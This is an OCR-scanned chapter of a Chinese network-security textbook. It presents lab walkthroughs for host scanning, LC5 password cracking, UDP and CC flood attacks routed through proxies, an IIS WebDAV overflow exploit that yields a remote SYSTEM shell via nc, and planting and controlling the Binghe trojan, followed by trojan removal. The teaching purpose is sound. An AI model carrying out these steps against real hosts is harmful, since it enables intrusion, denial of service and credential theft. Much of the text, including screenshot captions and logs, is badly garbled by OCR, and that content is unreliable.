E 7n iac m 
Ea ida Nr 
ES f autoexec. bat NT 
EQ Global asa m 
E / f a 
ER /a Nr 
[z. TAN IPSI "m a 
a > 
ETUI 
| | 

















图 3-27 设置 参数 第 3 步 
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共计 [0011] 个 括 件 





Minaows Nr/2000 


描述 

加 ccProxy 6.2 Exploit 

[V] FrontPage 2000 Extension Exploit 

FP Server 

回 TTS 5.0 WEBDAV Exploit 

回 Irss.0 NULL Printer Exploit 

mL Session Avaliable 

回 sm Get os 

回 windows 2000 RPC Locator Remote Exploit 
IIS 5.0 WEBDAV Anonymouse Deploy 


图 3-28 ”设置 参数 第 4 步 


IE 











Mmm 














EIS 
[C:\Program Files Wluxay brute. dic PJ 
保存 扫描 报 省 : 








[C:\Program Files\Fluxay\Reports\192. 168. : (>>] 


并 发 线程 数目 jo — 网 络 选项 0) 

















图 3-29 设置 参数 第 5 步 


3. 扫描 结果 





设置 参数 完成 后 ,流光 的 扫描 引擎 可 安装 在 不 同 主机 上 (包括 本 地 主机 )。 单 击 “ 开 


按钮 ,窗口 右 侧 及 下 侧 滚动 显示 扫描 结果 ,如 图 3-30 和 图 3-31 所 示 。 














图 3-30 扫描 主机 
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x 小 榕 软 件 -【 流 光 5- 0 Build 3310 《0 用 户 ) 







LFD SED 查看 WW) FWY AAO IRV R00 XFA 
FURER: - 
口号 pop3 主 机 
DS map 主机 
D rre 主机 
DO HTTP 主机 
DJ PRoxvy=#L 
DJ! FoRM 主机 
OF» mssa 主机 
c- I EES 

Dg sure 主机 

DË recs 主机 
D sra deste 
DË 探 则 历史 纪录 


















































图 3-31 滚动 显示 扫描 结果 


4. 扫描 结束 
查看 扫描 报告 如 图 3-32 和 图 3-33 所 示 。 





扫描 报 和 [ 日 其 





127.0.0.1-127.0.0.255,html 2006J05/17 01:27:22 
2011/08/30 00:09:57 
ETTTTETIT 





















图 3-32 扫描 报告 1 


主机 系统 版 本 | 类 型 描述 | 
[x] 小 榨 软 件 实验 室 1995-2002 小 榕 作品 版 权 所 有 
[= 5 [主机 
22 单词 — “jooo)ooz/1od “探测 广度 | NEN 停止 
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DAX 扫描 报告 - Nozilla Firefox 加 器 加 





Xt) RED 查看 如 PO PEO IAW 和 帮助 如 
€> @| X ô W A | _file:///C:/Progran Files/Fluxay/Reports/192. 168. 1 











O m 扫描 报 肖 * š 








http://www.netXeyes.corn 


http://www.netXeyes.org 
DNAR] 


小 榨 软 件 实验 室 1995-2002 











333 ”扫描 报告 2 


实 训 3.4 口令 破解 
【 实 训 目 的 】 


通过 口令 破解 工具 LC5 的 使 用 ,了 解 账号 口令 的 安全 性 ,掌握 安全 口令 的 设置 原则 ,以 
保护 账号 口令 的 安全 。LC5 软件 功能 非常 强大 ,通过 实验 来 掌握 如 何 使 用 LCS 来 破解 账号 
口令 。 系 统管 理 员 也 可 以 使 用 这 个 软件 来 检测 用 户 计算 机 口令 的 安全 性 。 


【 实 训 环 境 】 

(1) 两 台 安装 有 Windows 2000/2003/ XP 或 更 高 级 别 的 Windows 操作 系统 ,通过 网 络 
互联 。 

(2) LC5 口令 破解 软件 ,工具 软件 PWDump4。 

LC5 的 安装 过 程 具体 如 图 3-34 和 图 3-35 所 示 。 

选择 一 个 应 用 程序 ,安装 完 
【 实 训 内 容 】 


在 Windows 操作 系统 中 ,用 户 账号 和 口令 经 过 Hash 变换 后 以 Hash 列表 形式 存放 在 
\SystemRoot\system32 下 的 SAM 文件 中 。LC5 通过 破解 SAM 文件 来 获取 系统 的 账号 名 




















$33 网络 攻击 技术 115 








Welcome to the InstallShield Wizard 
for LC5 


The InstallShield Wizard(TM) will help install LCS on your 
computer. To continue, click Next. 











InstallShield Wizard 


Setup Type 


Select the Setup Type to install. Q 
Click the type ol Setup you prefer, then click Next 


G Wypical Program will be installed with the most common options. Recommended for 
š most users. 


C Compact Program will be installed with minimum required options. 


(C Custom — You may choose the options you want to install Recommended for advanced. 
users. 


334 LCS 安装 第 1 步 


< Back Cancel 








和 口令 。 
1. 建立 测试 账户 


335 LCS 安装 第 2 步 


在 测试 主机 上 建立 用 户 名 test 的 账户 ,方法 是 依次 打开 “控制 面板 ”1 “计算 机 管理 ”, 在 
“本 地 用 户 和 组 ”中 选择 “新 用 户 ”, 如 图 3-36 所 示 ,输入 用 户 名 为 test, 口 令 为 空 。 





2. 运行 LCS 


在 LC5 主 界面 的 主 菜单 中 ， 











选择 “文件 ”1“LC5 向 导 ” 菜 单 命令 ,按照 提示 , 单 


Bt 
E 
| 


步 " 按 钮 ,系统 会 出 现 如 图 3-37 所 示 的 用 户 test 口 令 为 空 ” 的 破解 成 功 界 面 。 


3. 修改 口令 为 123123 





将 系统 口令 改 为 123123 ,再 





次 执行 ,LC5 很 快 就 破解 成 功 ,出 现 如 图 3-38 所 示 的 用 户 


test, HZ 123123 的 破解 成 功 界面 。 
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= Pi d 全 名 E 
rf # vmware user. VMware User 
s p) 事件 查看 器 管理 计算 机 ( 城 ) 的 内 置 帐户 


š UE d ASP.NET Machine Account — Account used for running the ASP.N... 


SAP 供 来 宾 访 问 计算 机 或 访问 域 的 内 … 
Ci 远程 桌面 助手 帐户 提供 远程 协助 的 帐户 

性 能 日 志和 警报 x Internet 来 宾 帐 户 匿名 访问 Internet 信息 服务 的 内 ，… 
设备 管理 器 E 启动 s 进程 帐户 用 于 启动 进程 外 应 用 程序 的 Inter... 


日 图 存储 SQLDebugger This user account is used by the Visu... 
we) ues SUPPORT. 38... CNeMrosoft Corporation... 这 是 一 个 帮助 和 支持 服务 的 提供 ，， 
TERRESTRE 
Ed BusR ZI VSA Server Account 
u ge 服务 和 应 用 程序 





图 3-36 建立 账户 


Í@ Lc5 容 笑 汉 化 版 QQ:40940064 http:1978229.126.c 
SO WWG S Q HED PH 
































ASPNET 
HalpAssstant 
1USR. Z2 
IWAM Z2 














图 3-37 破解 成 功 
[C estare Lcs- Piti | 


File View Session Schedule Bem 












DICTIONARY/ HYBRID 








test 123123 x 123123 | 
Administrator 








Dictionary 1 of 1 [C:\Program Files\@stake\LCS\words-english dic] [oom E 


图 3-38 再 次 破解 成 功 
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4. 修改 口令 为 security123 
将 系统 口令 改 为 security123 ,再 次 执行 ,LC5 没有 完全 破解 ,出 现 如 图 3-39 所 示 的 界面 。 


LLYPTUYPUEKWACYTUSUTTP] 


.. |HelpAssistant 
| SUPPORT 38894540 

+. [test 

.. Administrator 








图 3-39 破解 失败 


这 是 因为 刚才 口令 设置 成 了 “字符 串 ” 十 “数字 ”格式 ,比较 复杂 ,所 以 破解 不 能 成 功 , 必 
须 选 择 复杂 口令 破解 方法 。 


实 训 3.5 拒绝 服务 攻击 


【 实 训 目的 】 


通过 练习 使 用 DoS/ DDoS 攻击 工具 对 目标 主机 进行 攻击 ,理解 DoS/ DDoS 攻击 的 原理 
及 其 实施 过 程 ,掌握 检测 和 防范 DoS/DDoS 攻击 的 措施 。 


【 实 训 环 境 】 


(1) 两 台 安装 Windows Server 2008 的 PC, 在 其 中 一 台 安 装 UDP Flood 软件 .CC 攻击 
软件 和 花 刺 代理 软件 。 
(2) 两 台 PC 通过 Hub 相连 ,组 成 一 个 局 域 网 。 


【 实 训 内 容 】 


1. UDP Flood 攻击 练习 


(1) UDP Flooder 是 一 种 采用 UDP Flood 攻击 方式 的 DoS 软件 ,可 以 向 特定 的 IP 地 
址 和 端口 发 送 UDP 包 。 在 IP/hostname 和 Port 框 中 指定 目标 主机 的 IP 地 址 和 端口 号 ， 
Max duration 设 定 最 长 的 攻击 时 间 , 在 Speed 框 中 可 以 设置 UDP 包 发 送 的 速度 ,在 Data HE 
中 ,定义 UDP 数据 包 包含 的 内 容 , 默 认 情 况 下 为 UDP Flood. Server stress test 的 文本 内 
容 。 单 击 Go 按钮 即 可 对 目标 主机 发 起 UDP Flood 攻击 ,如 图 3-40 所 示 。 

(2) 在 被 攻击 主机 中 可 以 查看 收 到 的 UDP 数据 包 , 这 需要 事先 对 系统 监视 器 进行 配 
置 。 打 开 ” 控 制 面板 "| “管理 工具 ”| * 性 能 ”, 首 先 在 系统 监视 器 中 单 击 右 侧 图 文 框 上 面 的 
“十 ”按钮 或 单 击 鼠标 右键 ,选择 “添加 计数 器 ”命令 ,如 图 3-41 所 示 。 
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UDP Flooder 2.00 





Destination 
IP/hostname | Pot 


Transmission control- 





Max duration [secs] Maxpackes 门 


min 
Speed (pkts/sec) 
1 


Modem -->— Cable-5— T1 —--LAN | 








- Data 

C Random to bytes 

G Test UDP Flood. Server stress test ===" 
Cromie Baws www 











Ë 文件 下。 MEO FEV KERO SOW ED 




































+ > ome 
SEL O HEB Xo masoss 
porum D Q["s Bus +x ç teg O = ° 
i-i] 性 能 日 志和 警报 100 
80 
80 
40 
20 
0 
RAI 0.000 平均 | 0.000 最 小 0.000 
最 大 [ 0.000 图形 时 间 1:40 
100... Avg. Disk... AAiecn371 
1.000 Process... Total — — Proe.. AAiecs371 











图 3-41 被 攻击 主机 监视 器 查看 数据 包 


(3) 在 弹出 的 对 话 框 中 添加 对 UDP 数据 包 的 监视 ,在 "性 能 对 象 " 下 拉 列 表 框 中 选择 
UDP 协议 ,在 “从 列表 选择 计数 器 ?列表 中 选择 Datagram Received/sec, 即 对 收 到 的 UDP 
数据 包 进 行 计数 ,然后 配置 好 包 计 数 器 信息 的 日 志文 件 , 如 图 3-42 所 示 。 

(4) 在 被 攻击 主机 上 打开 Wireshark 工具 ,可 以 捕获 由 攻击 者 计算 机 发 到 本 地 计算 机 
的 UDP 数据 包 , 可 以 看 到 内 容 为 UDP Flood. Server stress test 的 大 量 UDP 数据 包 , 如 
图 3-43 所 示 。 

2. CC 攻击 练习 

CC 主要 是 用 来 攻击 页 面 的 。 对 于 论坛 ,访问 的 人 越 多 .论坛 的 页 面 越 多 ,数据 库 就 越 
大 ,被 访问 的 频率 也 越 高 ,占用 的 系统 资源 也 就 相当 可 观 。CC 就 是 充分 利用 这 个 特点 , 模 
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应 加 计数 器 


加 使 用 丰 地 计算 机 计数 器 o 
ONHE HR Q0 


AAiecm371 [2 
HRW: E 
UDP ~ 





侣 所 有 计数 器 中 
加 从 列 天 选择 计数 器 D 


Datsgrams No Port/sec 
Datagrans Received Errors 





Datagrans Sent/sec 
Datagrans/sec 

















图 3-42 配置 日 志文 件 


Sniffer Portable - Local, Ethernet (Line speed at 100 Wbps) — [Snifl: 
E File Monitor Capture Display Tools Database Window Help 


m ni ONCE 2| e| S ol »| [^| Fm 


== LX 5 LEN-49 
122 56 LEN=49 
IEN=49 


122]|UDP 
122] UDP 
122]|UDP 
122) pe 

DP 











= 1056 
ination port = 80 (VWW/WWW-HTTP/HTTP) 





Sc fd id la 00 Oc 29 89 5 0 \?...) 增 (. .下 
3b d3 00 00 80 11 7a 8f cO a8 01 7b a8 ? c zx? (16 

04 20 00 50 00 31 22 fe IOIPdt een 
50 20 46 6c 6f 6f 64 2e 

73 74 72 65 73 73 20 74 





Expert À Decode A Matrix À Host Table } Protocol Dist. À, Statistics / 
[For Help, press F1 











3-43 用 Wireshark 捕获 数据 包 


拟 多 个 用 户 ( 多 少 线程 就 是 多 少 用 户 ) 不 停 地 进行 访问 (访问 那些 需要 大 量 数据 操作 ,也 就 是 
需要 大 量 CPU 时 间 的 页 面 ) 。 

代理 可 以 有 效 地 隐藏 身份 ,也 可 以 绕 开 所 有 的 防火 墙 ,因为 几乎 所 有 的 防火 墙 都 会 检测 
并 发 的 TCP/IP 连接 数目 ,超过 一 定数 目 、 一 定 频率 就 会 被 认为 是 Connection-Flood。 使 用 
代理 还 能 很 好 地 保持 廉洁 ,这 里 发 送 了 数据 ,代理 帮助 转发 给 对 方 服务 器 ,就 可 以 马上 断 开 ， 
代理 还 会 继续 保持 着 和 对 方 的 连接 。 

(1) 打开 CC 的 可 执行 程序 ,如 图 3-44 所 示 。 

(2) 在 TargetHttp 文本 框 中 输入 要 攻击 的 目标 地 址 , 单 击 LoadProxy 按钮 ,出 现 如 
图 3-45 所 示 对 话 框 。 
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; CC v 2.1b Coded By Fr.Qaker[E.S.T]Beta Version 


Refer [ner google. con 





Host fwrw. hackeroo. con 
Cookie [ 
ConnectTime I5 SendWait[5 — Seckets[z — Thsfio 








LosdProxy | AddAtteck | DelAttack About 


Fr Qaker[E S T] E EA 
ESEA, EDER 
estas, DINEE 











图 3-44 CC 可 执行 程序 


查找 范围 外; | < 本 地 磁盘 0:) Jemm 


后 necements and Settings 
(Ò Microsoft Visual Studio 8 


oracle 
(O Progra Files 
后 实用 软件 

目 


文件 名 轩 ; [Proxies2008-10-03 
文件 类 型 D: - "m 





图 3-45 显示 代理 文件 


(3) 从 文件 列表 中 找到 代理 文件 , 单 击 “ 打 开 ” 按 钮 ,出 现 如 图 3-46 所 示 界 面 , 可 以 看 到 
代理 文件 中 的 代理 加 入 了 攻击 的 行列 。 


- CC v 2.1b Coded By Fr.Qaker[E.S.T]Beta Version x) 


TargetHttp [ttp /frm hackeroocm = OO 
Refer rw edecm rcrr i 
Host [ev hackeroo. con. 
Cookie [ 


ConnectTime 15 SendWait[ — Sockets[z2 — Thsfio - 








Losdfroxy | AddAttack sca | About | 





aaue: See. eviloctal. com 





A 3-46 查看 攻击 队列 





(4) 在 主 界面 , 单 击 AddAttack 按钮 ,开始 攻击 。 多 单 击 AddAttack 按钮 几 次 ,每 单 击 
一 次 攻击 强度 就 加 强 一 倍 。 使 用 netstatan 命令 可 以 查看 攻击 状态 。 
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(5) 代理 和 验证 软件 “ 花 刺 代理 验证 ”的 主 界面 如 图 3-47 所 示 。 


= 花 刺 代理 验证 (ProxyThorn) 1.8 








代理 列表 : 077; IE: no proxy 
服务 器 地 址 mH mü [-&ii- 














51.144222. 68 
61.145.73.211 

219. 149.233. 179 

219. 149.76. 198 

61.150. 115.245 

202.113 49.22 

61.179.12.210 

61.179.12.213 

219.238.6 194 

216.15.111. 195 

220.189.220.8 

61.179.12.212 

211.90. 132.29 2 ` 

> 


A Teta e 








回 华中 大 在 线 -今日 代理  http://info. hustonline. net/info/index/proxyshow. aspx 
回 西 交 共 享 -代理 大 全 http://www xjtushare. coa/proxy. aspx 











图 3-47 查找 验证 
(6) 可 以 采用 在 网 上 搜索 “今日 代理 ”, 保 存 为 如 图 3-48 所 示 格 式 的 记事 本 文件 。 


Ë 代理 2-txt - 记事 本 


文件 @) RED ERO 
帮助 Qf) 
282.117.27.64:8888 
61.55.135.167:8080 
218.98.195.19:55^ 
211.138.198.7:10917 
202.117.27.65:8080 
218.86.126.226:88 
203.160.1.43:553 
221.13.66.161:88 
202.97.159.167:3128 
195.175.37.71:8088 
61.129.47.79:88 
202.97.159.167:3128 
221.215.6.188:808 
282.103.252.86:3128 
219.218.128.218:3128 
202.194.210.9:3128 





3-48 代理 文件 


(7) 在 “ 花 刺 代理 验证 ? 主 界 面 中 单 击 “ 导 入 ”按钮 ,再 单 击 * 验 证 全 部 按钮。 对 于 可 用 
的 代理 选 定 , 单 击 “ 导 出 选 定 ”按钮 成 为 CC 攻击 可 用 的 代理 文件 。 





实 训 3.6 缓冲 区 溢出 攻击 


【 实 训 目的 】 


IIS 5. 0 默认 提供 了 对 WebDAV 的 支持 ,WebDAYV 可 以 通过 HTTP 向 用 户 提 供 远 程 
文件 存储 的 服务 。 但 IIS 5.0 包含 的 WebDAV 组 件 不 充分 检查 传递 给 部 分 系统 组 件 的 数 
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据 , 远 程 攻 击 者 利用 这 个 漏洞 对 WebDAV 进行 缓冲 区 溢出 攻击 ,可 能 以 Web 进程 权限 在 
系统 上 执行 任意 指令 。 

IIS 5. 0 的 WebDAV 使 用 了 ntdll. dll 中 的 一 些 API 函数 ,而 这 些 函 数 存 在 一 个 缓冲 区 
溢出 漏洞 。 通 过 对 WebDAV 的 畸形 请 求 可 以 触发 这 个 溢出 ,成 功利 用 这 个 漏洞 可 以 获得 
LocalSystem 权限 。 这 意味 着 人 侵 者 可 以 获得 主机 的 完全 控制 能 力 。 


【 实 训 环境 】 


(1) 局 域 网 环境 , 预 装 Windows Server 2003 的 多 台 主 机 ,实验 前 停止 运行 杀毒 软件 。 
(2) 黑客 软件 WebDAVScan 和 WebDAVx3。 


【 实 训 内 容 】 


用 黑客 软件 WebDAVScan 和 WebDAV x3 扫描 并 双击 有 缓冲 区 溢出 漏洞 的 计算 机 。 
(1) 运行 WebDAVScan 程序 ,并 单 击 “ 扫 描 " 按 钮 ,对 有 漏洞 的 主机 进行 漏洞 扫描 ,如 
图 3-49 所 示 。 














|; WebDAYScan V1.0 特别 版 ( 免 病 星 ) 














IP 地 址 参数 设置 

起 始 IP: [192. 168. 1. 10 SARIP: [192 168. 1.254 $42: [oo ”超时 [10000 端口 [eo 
扫描 停止 

IP Address HTTP Banner WebDAV 

182. 188. 1. 11 Mi crosoft-IIS/S. 1 Enable 


























图 3-49 用 WebDAVScan 进行 扫描 


(2) 执行 WebDA Vx3 程序 ,对 有 漏洞 的 计算 机 发 起 攻击 ,如 图 3-50 所 示 。 
“` CMD.EXE - webdavx3.exe 192.168.1.11 = DJ xl 


FF: tools webdaux WebDauR3>uebdaux3.exe 192.168.1.11 
IIS WebDAV overflow remote exploit by isnoBxfocus.org 
Pt to try offset, 
OP a long time, you can press ^C and telnet 192.168.1.11 7788 
y offset: 8 
y off: 1 
luaiting for iis restart 





try offset: 3 


3-50 ”执行 WebDAVx3 程序 发 起 攻击 
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(3) 攻击 结果 是 获得 了 对 远程 计算 机 的 超级 用 户 访问 权 , 如 图 3-51 所 示 。 


C:\>nc -vu 192.168.1.11 7788 

192.168.1.11: inverse host lookup failed: h errno 11084: NO DRTR 
(UNKNOWN) [192.168.1.11] 7788 (?) open 

Microsoft Windous 2883 [Uersion 5.88.2195] 

(C) 版 权 所 有 1998-2010 Microsoft Corp.| 

C: NIINNTNSysten32» 

以 下 是 遭 到 WBpau 溢 出 到 击 后 的 8 日 志 主 要 特征 ， 

2811-8-16 85:51:38 492.168.1.200 - 192.168.1.25^ 80 LOCK 
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


iem m e Rede Ea M TAERA ERN 
ROSA ESRA 25 (8 E SD OR] Pria 

TTE SERERE EP f ali; 
ffilomidomfafdfgfhinhnlaljbeaaaaaalimmmmmmnnpdklojieaaaaaaipefpainlnpepppppp 
gekbaaaaaaaaijehaigeijdnaaaaaaaamhefpeppppppppile 
fpaidoiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaolagibngaaeaaaaailagdneoeoeoe 
ohfpbidmgaeikagegdnfjhfpjikagegdmfihfpcggknggdnf j 
fihfokppogolpofifailhnpaijehpcndileeceamafliaaaaaanhaaeeddccbbddmamdolomoihh 
PPPpppcecececeNNNNNNNNNNNNHNNNNNNNNNNNNNNNNNNNNNN 
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN 














351 攻击 结果 


实 训 3.7 木马 攻击 
【 实 训 目 的 】 
(1) 通过 对 木马 的 练习 ,使 读者 理解 和 掌握 木马 传播 和 运行 的 机 制 。 
(2) 通过 手动 删除 木马 ,掌握 检查 木马 和 删除 木马 的 技巧 ,学 会 防御 木马 的 相关 知识 ， 
加 深 对 木马 的 安全 防范 意识 。 
【 实 训 环境 】 


CD 扫描 端口 工具 : 20CN IPC 扫描 器 ; 木马 程序 : 冰河 ROSE 版 。 
(2) 局 域 网 环境 ,PC 若干 台 。 


【 实 训 内 容 】 


1. 入 侵 实 验 

CD 扫描 网 络 中 的 IPC$ 漏 洞 并 植 和 木马 ,打开 扫描 器 ,如 图 3-52 所 示 。 

(2) 设置 扫描 的 IP 开始 地 址 和 结束 地 址 ,如 图 3-53 所 示 o 

例如 ,扫描 IP 地 址 在 192. 168. 3. 20 至 192. 168. 3. 50 这 一 区 间 内 的 主机 ,设置 “ 步 进 ” 
为 1, 逐个 扫描 主机 ,线程 数 "默认 为 64,“ 线 程 时 延 " 默 认为 50。 选 择 要 植 和 人 的 木马 程序 ， 
选择 “冰河 木马 ”。 扫 描 过 程 显示 每 个 IP 的 扫描 结果 。 扫 描 完 成 后 会 自动 植 人 有 IPC $ 漏 
洞 的 主机 , 接 下 来 就 可 以 控制 了 。 

2. 连接 登录 远程 主机 

Q) 打开 冰河 木马 程序 客户 端 , 选 择 * 文 件 "| "搜索 计算 机 ?菜单 命令 ,设置 “起 始 域 ” 起 
始 地 址 ?和 ”终止 地 址 ,进行 以 下 设置 ,监听 端口 、 延 迟 选 择 默 认 值 , 如 图 3-54 所 示 。 
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图 3-53 设置 扫描 地 址 


(2) 搜索 结果 如 图 3-55 左 侧 所 示 ,在 192. 168. 3. 28 和 192. 168. 3. 29 前 面 是 OK 表示 
可 以 连接 ,其 他 主机 都 是 ERR 表示 不 能 建立 连接 。 或 者 选择 “文件 ”1“ 添 加 计算 机 ”菜单 命 
令 , 在 弹出 对 话 框 中 输入 扫描 并 已 植 人 木马 的 远程 主机 IP,“ 访 问 口令 ”为 空 ,“ 监 听 端 口 " 默 
认为 7626, 如 图 3-55 所 示 。 

(3) 当 出 现 192. 168. 3. 28 和 192. 168. 3. 29 两 台 远程 主机 的 IP 时 ,表示 可 以 与 这 两 台 
主机 连接 ,如 图 3-55 所 示 。 


$33 ”网络 攻击 技术 125 





| 
SHE] dE] 设置 [G] EH 


m £a 2) S SE jp ou MO @ R 


wma [meses — zJ wa: 2 ` umoe:[ .&mu | 














图 3-54 木马 客户 端 
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3-55 设置 地 址 和 端口 


3. 控制 操纵 远程 主机 





(1) 单 击 主机 的 IP 地 址 ,并 与 它 建立 连接 ,选择 192. 168. 3. 28 ,如 图 3-56 所 示 。 右 边 


出 现 该 主机 的 盘 符 , 单 击 可 以 打开 查看 ,并 且 可 以 下 载 其 中 的 文件 保存 到 本 机 。 


(2) 单 击 命令 控制 台 ,可 以 进一步 控制 主机 ,如 图 3-57 所 示 。 左 边 出 现 口 令 类 命令 、 控 
制 类 命令 .网络 类 命令 文件 类 命令 、 注 册 表 读 写 \ 设 置 类 命令 。 
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3x57 ”控制 主机 


(D 口令 类 命令 ,分 系统 信息 及 口令 、 历 史 口 令 和 击 键 记 录 。 系 统 信息 及 口令 如 图 3-58 
所 示 。 
有 4 个 按钮 ,可 以 查看 远程 主机 的 系统 信息 ,包括 其 详细 配置 情况 、 系 统 设置 .各 盘 符 的 
使 用 情况 等 ,还 可 以 获取 开机 口令 .缓存 口令 和 其 他 口令 。 

@ 控制 类 命令 ,分 捕获 屏幕 .发送 信息 、 进 程 管理 .窗口 管理 ,系统 控制 .鼠标 控制 及 其 
他 控制 。 捕 获 界面 如 图 3-59 所 示 。 
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图 3-58 口令 类 命令 
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图 3-59 控制 类 命令 
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屏幕 控制 可 以 查看 远程 主机 的 屏幕 ,掌握 远程 主机 上 的 一 举 一 动 , 还 可 以 根据 网 络 情况 
制定 不 同 的 传送 方案 。 发 送信 息 界面 如 图 3-60 所 示 。 
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图 3-60 远程 主机 界面 


可 以 向 被 控制 的 主机 发 送 一 条 消息 ,在 远程 主机 将 跳出 一 个 窗口 ,如 图 3-60 中 间 所 示 ， 
本 机 上 可 以 设置 跳出 窗口 的 标题 ,图 标 类 型 (提示 、 警 告 通 知 )、 信 息 正 文 、 按 键 类 型 (确定 、 
取消 忽略、 调试 )。 控 制 进程 界面 如 图 3-61 所 示 。 
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图 3-61 控制 进程 界面 
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O 网 络 类 命令 有 创建 共享 ,删除 共享 、 网 络 信息 ,如 图 3-62 Bron. 
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图 3-62 网 络 类 命令 


创建 共享 可 以 把 远程 主机 上 的 文件 设 为 共享 并 设 定 共享 名 。 删 除 共 享 则 把 远程 主机 上 
的 共享 删除 ,消除 和 人 侵 痕迹 。 网 络 信息 可 查看 远程 主机 的 网 络 连接 等 信息 。 

@ 文件 类 命令 ,修改 远程 主机 的 文件 信息 。 

@ 注册 表 读 写 , 修 改 远 程 主机 的 注册 表 信 息 。 

@ 设置 类 命令 ,设置 远程 主机 的 一 些 配 置 。 


4. 查 杀 木马 
当 机 器 无 故 经 常 重启 .口令 信息 泄露 .桌面 不 正常 时 ,就 可 能 感染 了 木马 程序 病毒 ,需要 
进行 杀毒 。 


CD 判断 是 否 存在 木马 。 一 般 病毒 都 要 修改 注册 表 , 可 以 在 注册 表 中 查看 到 木马 的 痕 
迹 。 单 击 “ 开 始 ”|“ 运 行 "命令 ,输入 regedit, 这 样 就 进入 了 注册 表 编 辑 器 。 

依次 打开 子 键 目录 HKEY_LOCAL _MACHINE\SOFTWARE\Microsoft\ Windwos\ 
CurrentVersion \Run, 如 图 3-63 所 示 。 

(2) 在 目录 中 发 现 第 一 项 的 数据 C:\Windows\system32\kernel32. exe. kernel32. exe 
就 是 冰河 木马 程序 在 注册 表 中 加 入 的 键 值 ,将 该 项 删除 。 

打开 HKEY LOCAL MACHINE SOFTWARE N MicrosoftN WindwosN Current Version \ 
RunOnce, 如 图 3-64 所 示 。 

(3) 在 目录 中 也 发 现 了 一 个 键 值 C:\Windows\system32\ kernel32. exe, 将 其 删除 。 
Run 和 RunOnce 中 存放 的 键 值 是 系统 启动 的 程序 。 

一 般 的 病毒 、 木 马 、 后 门 等 都 是 存放 在 这 些 子 键 目录 下 ,所 以 要 经 常 检 查 这 些 子 键 目 录 
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图 3-64 删除 kernel32. exe $& ff 


下 的 程序 ,如 有 不 明 程序 , 则 要 认真 检查 。 删 掉 其 在 注册 表 中 的 启动 项 后 ,再 删除 病毒 源 
文件 。 

打开 C:\Windows\system32, 找 到 kernel32. exe 程序 将 其 删除 ,如 图 3-65 所 示 。 

(4) 打开 C:\Windwos\system32, 找 到 Sysexplr. exe 将 其 删除 ,如 图 3-66 所 示 。 之 后 
重启 ,冰河 木马 就 彻底 被 删除 掉 了 。 

(5) 在 控制 端 再 用 冰河 木马 搜索 可 连接 主机 ,如 图 3-67 所 示 , 可 以 发 现 已 经 搜索 不 到 
192. 168. 3. 28 主机 了 ,而 另 一 台 192. 168. 3. 29 主机 仍旧 是 可 连接 的 。 
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删除 kernel32. exe 文件 
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[ur 119.160.3855 ， 共 找到 27 台 计算 机 ， 其 中 3 各 可 用 


3-67 搜索 可 连接 主机 





第 4 章 防火墙 技术 


在 计算 机 网 络 中 ,防火墙 所 起 的 作用 类 似 于 门卫 ,是 网 络 安全 的 第 一 道 防线 , 它 将 内 部 
网 和 Internet 隔离 ,是 在 两 个 网 络 通信 时 执行 的 一 种 访问 控制 尺度 , 它 能 允许 你 "同意 "的 人 
和 数据 进入 你 的 网 络 , 同 时 将 你 “不 同意 ”的 人 和 数据 拒 之 门 外 , 最 大 限度 地 阻止 网 络 中 的 黑 
客 来 访问 你 的 网 络 。 

从 访问 控制 的 角度 ,防火 墙 是 一 个 由 软件 和 硬件 设备 组 合 而 成 .在 内 部 网 和 外 部 网 之 
间 、 专 用 网 与 公共 网 之 间 的 界面 上 构造 的 保护 屏障 ,使 Internet 与 Intranet 之 间 建 立 起 一 个 
安全 网 关 (Security Gateway) ,从 而 保护 内 部 网 免 受 非法 用 户 的 侵入 。 防 火 墙 本 质 上 是 一 个 
访问 控制 系统 。 


4.1 访问 控制 
4.1.1 访问 控制 基本 概念 


从 安全 属性 的 角度 来 看 ,信息 安全 性 包括 机 密 性 .完整 性 和 可 用 性 。 信 息 安全 属性 通过 
安全 策略 来 描述 。 安 全 策略 (Security Policy) 是 为 了 描述 系统 的 安全 需求 而 制定 的 对 用 户 
行为 进行 约束 的 一 整套 严谨 的 规则 。 这 些 规则 规定 系统 中 所 有 授权 的 访问 ,是 实施 访问 控 
制 的 依据 。 

访问 控制 模型 是 安全 策略 的 具体 实现 , 它 依 据 一 定 的 授权 规则 ,对 提出 的 资源 访问 加 以 
控制 。 访 问 控制 是 网 络 安全 防护 技术 的 主要 安全 策略 之 一 ,其 基本 任务 是 防止 对 资源 的 非 
法 访问 (包括 非法 用 户 访问 资源 和 合法 用 户 以 未 授权 的 方式 访问 资源 ) 和 保证 合法 用 户 合理 
访问 资源 。 访 问 控制 模型 的 主要 内 容 包括 两 个 方面 : 安全 策略 所 涉及 的 实体 (如 资源 、 用 户 
等 ); 组 成 安全 策略 的 规则 。 

身份 认证 技术 解决 了 识别 用户 是 谁 ”的 问题 ,那么 认证 通过 的 用 户 是 不 是 可 以 无 条 件 
地 使 用 所 有 资源 呢 ? 答案 是 否定 的 。 访 问 控制 技术 就 是 用 来 管理 用 户 对 系统 资源 的 访问 。 
访问 控制 是 国际 标准 ISO 7498 一 2 中 的 5 项 安全 服务 之 一 ,对 提高 信息 系统 的 安全 性 起 到 
至 关 重要 的 作用 ,如 图 4-1 所 示 。 

访问 控制 是 针对 越权 使 用 资源 的 防御 性 措施 之 一 。 其 基本 目标 是 防止 对 任何 资源 (如 
计算 资源 .通信 资源 或 信息 资源 ?进行 未 授权 的 访问 ,从 而 使 资源 使 用 始终 处 于 控制 范围 内 。 
最 常见 的 是 ,通过 对 主机 操作 系统 的 设置 或 对 路 由 器 的 设置 来 实现 相应 的 主机 访问 控制 或 
网 络 访问 控制 ,如 控制 内 网 用 户 在 上 班 时 间 使 用 QQ MSN 等 。 

访问 控制 对 实现 信息 机 密 性 完整 性 起 直接 的 作用 ,还 可 以 通过 对 以 下 信息 的 有 效 控 制 
来 实现 信息 和 信息 系统 可 用 性 : 中 谁 可 以 颁发 影响 网 络 可 用 性 的 网 络 管理 指令 ; @ 谁 能 够 
